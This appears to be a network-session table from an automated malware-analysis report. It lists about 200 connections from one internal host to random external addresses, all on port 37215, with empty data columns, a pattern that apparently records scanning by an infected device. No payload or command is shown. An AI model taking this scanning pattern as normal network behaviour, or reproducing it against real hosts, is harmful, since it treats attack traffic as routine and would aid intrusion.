                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3285192.168.2.1554802156.174.36.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3286192.168.2.1534040156.230.7.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3287192.168.2.1546682156.146.252.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3288192.168.2.1536914156.123.24.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3289192.168.2.1545496156.101.6.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3290192.168.2.1547330156.137.195.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3291192.168.2.1541496156.16.254.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3292192.168.2.1533940156.85.250.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3293192.168.2.1554820156.66.35.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3294192.168.2.1535034156.243.13.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3295192.168.2.1550550156.133.40.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3296192.168.2.1557476156.0.178.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3297192.168.2.1553492156.89.150.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3298192.168.2.1554922156.94.177.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3299192.168.2.1544896156.140.53.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3300192.168.2.1535928156.36.29.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3301192.168.2.1535668156.88.60.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3302192.168.2.1533604156.59.96.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3303192.168.2.1533746156.145.44.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3304192.168.2.1557324156.166.168.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3305192.168.2.1548828156.86.215.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3306192.168.2.1541772156.107.229.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3307192.168.2.1555740156.66.92.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3308192.168.2.1539178156.99.156.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3309192.168.2.1534172156.15.22.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3310192.168.2.1537270156.177.185.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3311192.168.2.1559794156.140.239.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3312192.168.2.1555230156.15.44.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3313192.168.2.1550188156.65.129.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3314192.168.2.1558078156.8.196.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3315192.168.2.1546160156.236.21.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3316192.168.2.1539838156.156.1.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3317192.168.2.1545044156.234.214.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3318192.168.2.1548458156.102.203.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3319192.168.2.1541886156.160.205.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3320192.168.2.1549346156.156.126.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3321192.168.2.1557806156.63.41.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3322192.168.2.1542980156.16.209.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3323192.168.2.1533272156.254.122.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3324192.168.2.1553178156.151.199.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3325192.168.2.1543426156.246.143.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3326192.168.2.1559928156.4.194.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3327192.168.2.1544188156.27.155.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3328192.168.2.1548436156.93.162.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3329192.168.2.1536764156.234.11.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3330192.168.2.1534418156.23.129.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3331192.168.2.1560918156.178.227.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3332192.168.2.1550380156.227.93.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3333192.168.2.1558842156.145.126.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3334192.168.2.1554928156.110.67.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3335192.168.2.1543144156.80.158.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3336192.168.2.1551646156.167.50.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3337192.168.2.1546416156.246.90.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3338192.168.2.1535544156.184.63.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3339192.168.2.1533558156.106.185.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3340192.168.2.1544972156.62.28.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3341192.168.2.1550354156.225.81.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3342192.168.2.1541248156.89.196.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3343192.168.2.1542978156.150.12.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3344192.168.2.1537482156.137.6.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3345192.168.2.1558496156.6.165.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3346192.168.2.1546616156.109.79.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3347192.168.2.1545922156.221.213.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3348192.168.2.1543968156.41.87.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3349192.168.2.1547032156.35.229.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3350192.168.2.1545648156.54.33.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3351192.168.2.1547026156.141.249.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3352192.168.2.1535072156.163.126.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3353192.168.2.1538924156.199.180.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3354192.168.2.1539200156.154.118.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3355192.168.2.1546904156.250.216.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3356192.168.2.1548780156.209.178.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3357192.168.2.1555848156.28.140.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3358192.168.2.1546360156.58.17.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3359192.168.2.1538816156.211.13.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3360192.168.2.1536824156.216.231.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3361192.168.2.1544242156.81.141.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3362192.168.2.1546710156.238.124.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3363192.168.2.1533790156.60.130.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3364192.168.2.1548220156.242.147.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3365192.168.2.1553336156.146.214.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3366192.168.2.1536536156.38.60.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3367192.168.2.1556870156.149.236.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3368192.168.2.1535034156.203.140.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3369192.168.2.1548912156.2.105.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3370192.168.2.1558524156.176.56.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3371192.168.2.1534218156.156.72.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3372192.168.2.1536848156.46.188.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3373192.168.2.1536120156.36.51.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3374192.168.2.1557358156.137.76.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3375192.168.2.1548236156.109.238.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3376192.168.2.1541348156.61.157.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3377192.168.2.1556914156.192.252.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3378192.168.2.1558896156.62.18.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3379192.168.2.1538078156.244.185.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3380192.168.2.1558494156.226.187.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3381192.168.2.1544002156.86.231.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3382192.168.2.1541814156.13.196.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3383192.168.2.1558098156.199.239.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3384192.168.2.1552500156.0.228.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3385192.168.2.1539324156.227.56.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3386192.168.2.1557936156.141.34.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3387192.168.2.1539580156.195.20.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3388192.168.2.1534412156.236.169.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3389192.168.2.1540540156.191.33.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3390192.168.2.1546318156.0.222.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3391192.168.2.1554070156.47.137.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3392192.168.2.1552058156.246.250.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3393192.168.2.1533558156.4.108.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3394192.168.2.1560624197.179.156.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3395192.168.2.1545486197.171.80.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3396192.168.2.1535370197.149.250.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3397192.168.2.1543868197.71.16.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3398192.168.2.1534462197.217.99.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3399192.168.2.1540534197.104.147.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3400192.168.2.1535418197.27.0.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3401192.168.2.1542250197.186.102.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3402192.168.2.1551998197.24.199.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3403192.168.2.1552034197.151.217.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3404192.168.2.1536244197.72.4.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3405192.168.2.1556352197.83.118.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3406192.168.2.1540602197.144.248.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3407192.168.2.1536830197.114.219.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3408192.168.2.1545204197.135.15.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3409192.168.2.1536748197.224.49.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3410192.168.2.1557406197.67.158.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3411192.168.2.1534902197.233.200.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3412192.168.2.1547946197.95.93.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3413192.168.2.1546436197.8.107.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3414192.168.2.1554152197.29.221.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3415192.168.2.1553368197.179.120.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3416192.168.2.1554026197.37.63.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3417192.168.2.1553476197.198.132.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3418192.168.2.1534888197.54.184.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3419192.168.2.1555900197.39.103.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3420192.168.2.1551110197.64.5.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3421192.168.2.1533624197.224.105.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3422192.168.2.1549822197.5.36.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3423192.168.2.1535750197.202.64.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3424192.168.2.1537846197.88.27.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3425192.168.2.1541478197.57.97.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3426192.168.2.1550478197.242.234.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3427192.168.2.1547834197.12.1.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3428192.168.2.1553952197.239.212.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3429192.168.2.1534064197.24.118.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3430192.168.2.1542934197.215.109.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3431192.168.2.1547036197.68.155.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3432192.168.2.1541950197.22.109.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3433192.168.2.1550344197.230.175.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3434192.168.2.1540312197.181.181.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3435192.168.2.1552240197.67.242.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3436192.168.2.1549646197.202.89.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3437192.168.2.1558128197.13.83.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3438192.168.2.1557780197.7.79.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3439192.168.2.1549558197.33.70.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3440192.168.2.1545154197.170.162.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3441192.168.2.1553298197.137.204.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3442192.168.2.1554110197.18.189.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3443192.168.2.1545336197.126.161.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3444192.168.2.1545374197.250.152.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3445192.168.2.1536470197.16.113.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3446192.168.2.1539462197.90.79.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3447192.168.2.1539072197.82.74.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3448192.168.2.1549426197.116.237.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3449192.168.2.1540190197.101.46.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3450192.168.2.1557636197.124.108.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3451192.168.2.1556654197.98.89.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3452192.168.2.1551838197.200.10.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3453192.168.2.1538266197.177.156.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3454192.168.2.1556972197.255.249.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3455192.168.2.1546692197.88.53.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3456192.168.2.1557232197.25.149.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3457192.168.2.1557682197.106.6.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3458192.168.2.1542162197.163.203.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3459192.168.2.1557434197.57.180.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3460192.168.2.1536772197.95.200.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3461192.168.2.1545594197.106.97.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3462192.168.2.1550966197.34.130.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3463192.168.2.1554626197.238.33.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3464192.168.2.1545650197.227.133.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3465192.168.2.1558524197.87.195.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3466192.168.2.1551746197.201.81.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3467192.168.2.1560194197.249.61.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3468192.168.2.1554714197.51.193.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3469192.168.2.1536420197.62.157.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3470192.168.2.1534870197.63.66.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3471192.168.2.1541592197.219.151.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3472192.168.2.1543860197.5.227.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3473192.168.2.1556898197.189.134.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3474192.168.2.1546910197.201.55.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3475192.168.2.1544472197.112.139.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3476192.168.2.1542614197.136.186.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3477192.168.2.1538550197.227.99.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3478192.168.2.1546270197.7.229.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3479192.168.2.1552358197.86.192.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3480192.168.2.1548818197.143.150.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3481192.168.2.1556820197.139.129.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3482192.168.2.1538778197.79.240.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3483192.168.2.1539122197.198.176.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3484192.168.2.1557028197.247.14.2437215
